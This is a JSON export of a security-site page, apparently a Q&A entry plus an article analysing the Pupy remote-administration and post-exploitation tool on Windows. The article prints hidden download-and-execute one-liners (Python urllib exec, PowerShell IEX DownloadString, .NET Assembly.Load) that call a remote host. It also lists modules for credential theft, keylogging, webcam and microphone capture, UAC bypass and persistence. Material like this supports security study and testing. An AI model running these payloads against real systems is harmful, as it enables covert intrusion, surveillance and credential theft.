[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQbG0Q4mcq4mB0MBtgV6bTEf5JWNyC7LHZCtPO4O-uWg":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},408,"How does the `py_oneliner` payload work and what is its advantage?","The `py_oneliner` payload generates a Python one-liner that downloads and executes code from a remote server using the `urllib` library. For example: `python -c 'import urllib;exec urllib.urlopen(\"http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J\").read()'`. Its advantage is that no file is written to disk, minimizing forensic traces, and the Python code remains in memory. This technique is part of Pupy's stealth execution capabilities, similar to methods described in [Penetration Techniques - Stealth Execution of Windows Remote Assistance](\u002Fnews\u002Fpenetration-techniques-stealth-execution-of-windows-remote-assistance).","\u003Cp>The `py_oneliner` payload generates a Python one-liner that downloads and executes code from a remote server using the `urllib` library. For example: `python -c &#39;import urllib;exec urllib.urlopen(&quot;http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J&quot;).read()&#39;`. Its advantage is that no file is written to disk, minimizing forensic traces, and the Python code remains in memory. This technique is part of Pupy&#39;s stealth execution capabilities, similar to methods described in [Penetration Techniques - Stealth Execution of Windows Remote Assistance](\u002Fnews\u002Fpenetration-techniques-stealth-execution-of-windows-remote-assistance).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpupy-exploitation-analysis-features-on-windows-platform\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-py_oneliner-payload-work-and-what-is-its-advantage-1777483838161","py_oneliner, download and execute, Python, memory-only, stealth, Pupy",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},102,"Pupy Exploitation Analysis - Features on Windows Platform","pupy-exploitation-analysis-features-on-windows-platform","Analyze Pupy's Windows features: installation, payload types (EXE, Python, PS1), connection methods, and post-exploitation modules for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pupy is a cross-platform remote administration and post-exploitation tool developed in Python, supporting many practical features.\u003C\u002Fp>\u003Cp>This article will introduce the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, classify its post-exploitation modules, and detail each function.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Installation Methods\u003C\u002Fli>\u003Cli>Supported Startup File Types\u003C\u002Fli>\u003Cli>Supported Connection Methods\u003C\u002Fli>\u003Cli>Supported Communication Protocols\u003C\u002Fli>\u003Cli>Introduction to Post-Exploitation Modules\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Installation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using docker\u003C\u002Fh3>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FInstallation\u003C\u002Fp>\u003Ch3>2. Direct installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone --recursive https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u003Cbr>cd pupy\u003Cbr>python create-workspace.py -DG pupyws\u003Cbr>pupyws\u002Fbin\u002Fpupysh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the -DG parameter will download template files from https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch2>0x03 Supported payload file types\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After starting pupy, enter gen -h to get instructions for generating payload files, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017291528_0_db8aa684db.jpeg\">\u003C\u002Fp>\u003Cp>Here is a detailed introduction one by one\u003C\u002Fp>\u003Ch3>1.client\u003C\u002Fh3>\u003Cp>Generate files in EXE format\u003C\u002Fp>\u003Cp>Example command for generating a 64-bit EXE file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f client -A x64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and generate the final EXE file\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The template file name corresponding to the above command is pupyx64.exe. The download link for the template file is: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch3>2.py\u003C\u002Fh3>\u003Cp>Generate a fully packaged Python file (all dependencies are packaged and executed from memory)\u003C\u002Fp>\u003Cp>Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will generate a Python file with content in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import zlib,marshal;exec marshal.loads(zlib.decompress('xxxxxxxxx')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where 'xxxxxxxxx' is the encrypted content\u003C\u002Fp>\u003Cp>The encryption method roughly involves serializing the code using marshal.dumps, followed by operations such as offset and XOR. For the specific encryption algorithm, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Futils\u002Fobfuscate.py#L9\u003C\u002Fp>\u003Cp>To cancel the encryption process and obtain the source file, add the --debug parameter. Example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding code location: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Fpayloads\u002Fpy_oneliner.py#L43\u003C\u002Fp>\u003Cp>The code logic is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if debug:\u003Cbr>    return payload\u003Cbr>return compress_encode_obfs(payload, main=True)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To run this Python file in a Windows Python environment, the following modules also need to be installed on Windows:\u003C\u002Fp>\u003Cul>\u003Cli>pywin32\u003C\u002Fli>\u003Cli>pycryptodome\u003C\u002Fli>\u003Cli>Crypto\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The Crypto package needs to be downloaded from http:\u002F\u002Fwww.voidspace.org.uk\u002Fpython\u002Fmodules.shtml#pycrypto\u003C\u002Fp>\u003Ch3>3.pyinst\u003C\u002Fh3>\u003Cp>Generate Python files compatible with pyinstaller\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f pyinst\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Difference from gen -f py: adds some header files to facilitate converting Python scripts to exe files using pyinstaller\u003C\u002Fp>\u003Cp>The usage of pyinstaller was introduced in the previous article 'Custom Script Development in Local Password Viewer LaZagne'\u003C\u002Fp>\u003Ch3>4.py_oneliner\u003C\u002Fh3>\u003Cp>Download and execute Python code from a server via the urllib library\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output the download and execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python -c 'import urllib;exec urllib.urlopen(\"http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J\").read()'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5.ps1\u003C\u002Fh3>\u003Cp>Generate startup code in powershell format, which first starts a Powershell process and then loads the dll within the Powershell process\u003C\u002Fp>\u003Cp>Command example for generating 32-bit files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command reads the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, adds configuration information and obfuscated Invoke-ReflectivePEInjection code, ultimately achieving DLL loading within the Powershell process.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll.\u003C\u002Fp>\u003Ch3>6.ps1_oneliner\u003C\u002Fh3>\u003Cp>Downloads and executes Powershell code from a server via IEX(New-Object Net.WebClient).DownloadString.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the download-and-execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http:\u002F\u002F192.168.1.1:9000\u002FDfsP5d2GPG\u002FxDrhpNdNTU');\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the base64-encoded execution code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -enc xxxxxxxxxxxxxxxxxxxx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>7.rubber_ducky\u003C\u002Fh3>\u003Cp>Generates a Rubber Ducky script and an inject.bin file.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f rubber_ducky\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>8.csharp\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format)\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f csharp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and use Casey Smith's PELoader to load the PE file from memory\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll\u003C\u002Fp>\u003Cp>For compilation and usage methods of the C# file, refer to the previous article 'Loading PE Files from Memory via .NET'\u003C\u002Fp>\u003Ch3>9..NET\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format) and compile it with mono, ultimately producing an exe format file\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires installation of the mono development environment; the Kali installation command is apt-get install mono-mcs\u003C\u002Fp>\u003Cp>For usage of mono, refer to the previous article 'Executing Shellcode via Mono (Cross-platform .NET Runtime Environment)'\u003C\u002Fp>\u003Cp>This command adds the functionality of compiling with mono on top of gen -f csharp\u003C\u002Fp>\u003Ch3>10..NET_oneliner\u003C\u002Fh3>\u003Cp>Load .NET assemblies from memory via PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output PowerShell code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -w hidden -enc \"xxxxxxxxxxxxxx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command adds the functionality of loading .NET assemblies from memory via PowerShell on top of gen -f .NET\u003C\u002Fp>\u003Cp>The implementation code for loading .NET assemblies from memory via PowerShell is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::Load(\"\"(new-object net.webclient).DownloadData(\"\"'http:\u002F\u002F{link_ip}:{port}{landing_uri}')).GetTypes()[0].GetMethods(\"\")[0].Invoke($null,@())\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The previous article 'Analysis of Exploiting .NET Assembly Loading from Memory (Assembly.Load)' analyzed methods for loading .NET assemblies from memory\u003C\u002Fp>\u003Ch3>Additional: Extra parameters\u003C\u002Fh3>\u003Cp>For the generated launcher files, the following parameters are also supported:\u003C\u002Fp>\u003Cul>\u003Cli>Whether to compress\u003C\u002Fli>\u003Cli>Whether to use system proxy\u003C\u002Fli>\u003Cli>Set connection count and interval time\u003C\u002Fli>\u003Cli>Set Python script to execute before startup\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Supported Connection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The following four types are supported:\u003C\u002Fp>\u003Cul>\u003Cli>bind, bind port, used as a forward connection\u003C\u002Fli>\u003Cli>auto_proxy, retrieve possible SOCKS\u002FHTTP proxy lists and use them, retrieval methods include: registry, WPAD request, gnome settings, environment variable HTTP_PROXY\u003C\u002Fli>\u003Cli>dnscnc, DNS protocol? (This feature is currently untestable)\u003C\u002Fli>\u003Cli>connect, default method, reverse connect to server\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Supported Communication Protocols\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain list via command gen -l\u003C\u002Fp>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FGet-Started#transport\u003C\u002Fp>\u003Cp>Currently supports the following categories:\u003C\u002Fp>\u003Cul>\u003Cli>obfs3\u003C\u002Fli>\u003Cli>http\u003C\u002Fli>\u003Cli>ssl\u003C\u002Fli>\u003Cli>ecm\u003C\u002Fli>\u003Cli>tcp_cleartext\u003C\u002Fli>\u003Cli>dfws\u003C\u002Fli>\u003Cli>rsa\u003C\u002Fli>\u003Cli>udp_secure\u003C\u002Fli>\u003Cli>kc4\u003C\u002Fli>\u003Cli>ec4\u003C\u002Fli>\u003Cli>ws\u003C\u002Fli>\u003Cli>scramblesuit\u003C\u002Fli>\u003Cli>udp_cleartext\u003C\u002Fli>\u003Cli>ssl_rsa\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Communication protocols of the above categories can be customized, modification location: pupy\u002Fpupy\u002Fnetwork\u002Ftransports\u002F\u003Ctransport_name>\u002Fconf.py\u003C\u002Ftransport_name>\u003C\u002Fp>\u003Ch2>0x06 Post-Exploitation Module Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Cp>Set listening port: listen -a ssl 8443\u003C\u002Fp>\u003Cp>View sessions: sessions\u003C\u002Fp>\u003Cp>Switch session: sessions -i \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Terminate session: sessions -k \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Usage example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017322122_1_72a62add13.jpeg\">\u003C\u002Fp>\u003Cp>After obtaining a session, enter help -M to display supported post-exploitation modules. Here, these modules are categorized and their functions introduced one by one\u003C\u002Fp>\u003Ch3>1. Privilege Escalation\u003C\u002Fh3>\u003Cp>(1) Use beroot to obtain information for privilege escalation, module: beroot\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FBeRoot\u003C\u002Fp>\u003Cp>(2) Use WinPwnage to attempt privilege escalation, module: bypassuac\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002Frootm0s\u002FWinPwnage\u003C\u002Fp>\u003Cp>(3) Switch to SYSTEM privileges, module: getsystem\u003C\u002Fp>\u003Cp>(4) Use Windows PowerShell ADIDNS\u002FLLMNR\u002FmDNS\u002FNBNS spoofer\u002Fman-in-the-middle tool Inveigh, module: inveigh\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FKevin-Robertson\u002FInveigh\u003C\u002Fp>\u003Ch3>2. Processes\u003C\u002Fh3>\u003Cp>(1) List\u002Fimpersonate process tokens, module: impersonate\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to the previous article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Cp>(2) Obtain current privileges, module: getprivs\u003C\u002Fp>\u003Cp>For privilege exploitation methods, refer to the previous article 'Penetration Techniques - Exploitation of Nine Windows Privileges'\u003C\u002Fp>\u003Cp>(3) Obtain the parent process of the current process, module: getppid\u003C\u002Fp>\u003Cp>For privilege switching via parent processes, refer to the previous article 'Penetration Techniques - Switching from Admin to System Privileges'\u003C\u002Fp>\u003Ch3>3. Credential Acquisition\u003C\u002Fh3>\u003Cp>(1) Use Lazagne to obtain credentials, module: lazagne\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FLaZagne\u002F\u003C\u002Fp>\u003Cp>The previous article 'Custom Script Development in the Local Password Viewer Tool LaZagne' introduced LaZagne\u003C\u002Fp>\u003Cp>(2) Export local user hashes from the registry, module: creddump\u003C\u002Fp>\u003Cp>For related details, you can refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>(3) Monitor memory and search for plaintext credentials, module: loot_memory\u003C\u002Fp>\u003Cp>Once enabled, it will continuously monitor memory.\u003C\u002Fp>\u003Cp>(4) Dump printable strings from process memory for further analysis, module: memstrings\u003C\u002Fp>\u003Cp>Can target specified processes; output format is a text file.\u003C\u002Fp>\u003Ch3>4. Network-related\u003C\u002Fh3>\u003Cp>(1) Send Get\u002FPost requests via HTTP protocol, module: http\u003C\u002Fp>\u003Cp>(2) TCP port scanning, module: port_scan\u003C\u002Fp>\u003Cp>(3) Port forwarding and SOCKS proxy, module: forward\u003C\u002Fp>\u003Cp>(4) Packet capture, module: tcpdump\u003C\u002Fp>\u003Cp>(5) UPnP operations, module: igd\u003C\u002Fp>\u003Cp>(6) Obtain certificates from servers, module: x509\u003C\u002Fp>\u003Ch3>5. Screen control\u003C\u002Fh3>\u003Cp>(1) Module for controlling the target screen via a browser: rdesktop\u003C\u002Fp>\u003Cp>After loading, you can control the target's screen through a browser, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017371161_2_d40bdf2647.jpeg\">\u003C\u002Fp>\u003Cp>Not only can view screen content, but also send mouse and keyboard messages\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Remote Desktop Protocol (RDP) is not used here\u003C\u002Fp>\u003Cp>(2) Using Remote Desktop Protocol (RDP), module: rdp\u003C\u002Fp>\u003Cp>Can be used to enable or disable remote desktop connections, and also supports verifying credentials of remote hosts\u003C\u002Fp>\u003Ch3>6. Monitoring\u003C\u002Fh3>\u003Cp>(1) Keyboard and clipboard logging, module: keylogger\u003C\u002Fp>\u003Cp>(2) Record mouse clicks and capture surrounding areas, module: mouselogger\u003C\u002Fp>\u003Cp>(3) Screenshot, module: screenshot\u003C\u002Fp>\u003Cp>(4) Microphone recording, module: record_mic\u003C\u002Fp>\u003Cp>(5) Webcam capture, module: webcamsnap\u003C\u002Fp>\u003Ch3>7. Obtain system information\u003C\u002Fh3>\u003Cp>(1) View logs, module: logs\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017394493_3_28feb5695b.jpeg\">\u003C\u002Fp>\u003Cp>(2) Registry, module: reg\u003C\u002Fp>\u003Cp>Includes query, add, delete, modify, and search operations\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017437243_4_0c6fa9f635.jpeg\">\u003C\u002Fp>\u003Cp>(3) List local and remote shared folders and permissions, module: shares\u003C\u002Fp>\u003Cp>(4) View currently logged-in users, module: w\u003C\u002Fp>\u003Cp>(5) Retrieve service information, module: services\u003C\u002Fp>\u003Cp>(6) Get time, module: date\u003C\u002Fp>\u003Cp>(7) Retrieve EC2\u002FDigitalOcean metadata, module: cloudinfo\u003C\u002Fp>\u003Cp>(8) View and modify environment variables, module: env\u003C\u002Fp>\u003Cp>(9) Virtual machine detection, module: check_vm\u003C\u002Fp>\u003Cp>Supports identification of the following virtual machines:\u003C\u002Fp>\u003Cul>\u003Cli>Hyper-V\u003C\u002Fli>\u003Cli>VMWare\u003C\u002Fli>\u003Cli>Virtual PC\u003C\u002Fli>\u003Cli>Virtual Box\u003C\u002Fli>\u003Cli>Xen Machine\u003C\u002Fli>\u003Cli>Qemu machine\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Identification method: Query the registry\u003C\u002Fp>\u003Ch3>8. Execute Python commands\u003C\u002Fh3>\u003Cp>(1) Execute a single command, module: pyexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyexec -c \"import platform;print platform.uname()\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute Python commands in an interactive shell, module: pyshell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyshell\u003Cbr>import platform\u003Cbr>print platform.uname()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Load Python package, module: load_package\u003C\u002Fp>\u003Ch3>9. Execute CMD Commands\u003C\u002Fh3>\u003Cp>(1) Execute CMD commands via subprocess, module: shell_exec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>shell_exec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Simple popen call executed on a thread (slower but safer), module: pexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pexec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Interactive shell, module: interactive_shell\u003C\u002Fp>\u003Cp>Modified from winpty\u003C\u002Fp>\u003Cp>(4) Execute shellcode, module: shellcode_exec\u003C\u002Fp>\u003Cp>(5) Execute file in memory, module: memory_exec\u003C\u002Fp>\u003Ch3>10. Execute CMD Commands Remotely\u003C\u002Fh3>\u003Cp>Use smbexec\u002Fwmiexec to achieve remote command execution, module: psexec\u003C\u002Fp>\u003Cp>Supports using hash\u003C\u002Fp>\u003Ch3>11. Maintain Persistence\u003C\u002Fh3>\u003Cp>(1) Persistence, module: persistence\u003C\u002Fp>\u003Cp>For more methods, refer to: an open-source project\u003C\u002Fp>\u003Cp>(2) Duplicate current session, module: duplicate\u003C\u002Fp>\u003Cp>(3) Process migration, module: migrate\u003C\u002Fp>\u003Ch3>12. mimikatz\u003C\u002Fh3>\u003Cp>(1) Load mimikatz in memory, execute single command, module: mimikatz\u003C\u002Fp>\u003Cp>(2) Load mimikatz in memory, interactive, module: mimishell\u003C\u002Fp>\u003Ch3>13. powerview\u003C\u002Fh3>\u003Cp>(1) Direct invocation, module: powerview\u003C\u002Fp>\u003Cp>(2) Rewritten in Python, module: pywerview\u003C\u002Fp>\u003Ch3>14. File operations\u003C\u002Fh3>\u003Cp>(1) Upload, module: upload\u003C\u002Fp>\u003Cp>(2) Download, module: download\u003C\u002Fp>\u003Cp>(3) View file or folder attributes, module: stat\u003C\u002Fp>\u003Cp>(4) Edit file, module: edit\u003C\u002Fp>\u003Cp>(5) Write to file, module: write\u003C\u002Fp>\u003Cp>(6) Search files using Windows Search Index, module: isearch\u003C\u002Fp>\u003Cp>(7) Search for characters in all files under a specified directory, module: search\u003C\u002Fp>\u003Cp>(8) Access file shares via SMB protocol, module: smb\u003C\u002Fp>\u003Cp>(9) Connect to remote shared directory and search for files, module: smbspider\u003C\u002Fp>\u003Ch3>15. SSH client\u003C\u002Fh3>\u003Cp>(1) Connect to remote SSH server and execute commands, module: ssh\u003C\u002Fp>\u003Cp>(2) Connect to remote SSH server for a full interactive session, module: sshell\u003C\u002Fp>\u003Ch3>16. Outlook\u003C\u002Fh3>\u003Cp>Interact with the target user's Outlook session, module: outlook\u003C\u002Fp>\u003Ch3>17. Compression and decompression\u003C\u002Fh3>\u003Cp>Zip compression and decompression, module: zip\u003C\u002Fp>\u003Ch3>18. Lock screen\u003C\u002Fh3>\u003Cp>Module: lock_screen\u003C\u002Fp>\u003Ch3>19. View information of the connected back session\u003C\u002Fh3>\u003Cp>(1) Obtain network information for all sessions, module: netstat\u003C\u002Fp>\u003Cp>(2) Obtain information for the current session, module: get_info\u003C\u002Fp>\u003Cp>(3) View acquired credential information, command: creds\u003C\u002Fp>\u003Cp>(4) View server configuration information, command: config\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, categorizes its post-exploitation modules, and describes the functionality of each one.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pupy is a cross-platform remote administration and post-exploitation tool developed in Python, supporting many practical features.\u003C\u002Fp>\u003Cp>This article will introduce the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, classify its post-exploitation modules, and detail each function.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Installation Methods\u003C\u002Fli>\u003Cli>Supported Startup File Types\u003C\u002Fli>\u003Cli>Supported Connection Methods\u003C\u002Fli>\u003Cli>Supported Communication Protocols\u003C\u002Fli>\u003Cli>Introduction to Post-Exploitation Modules\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Installation 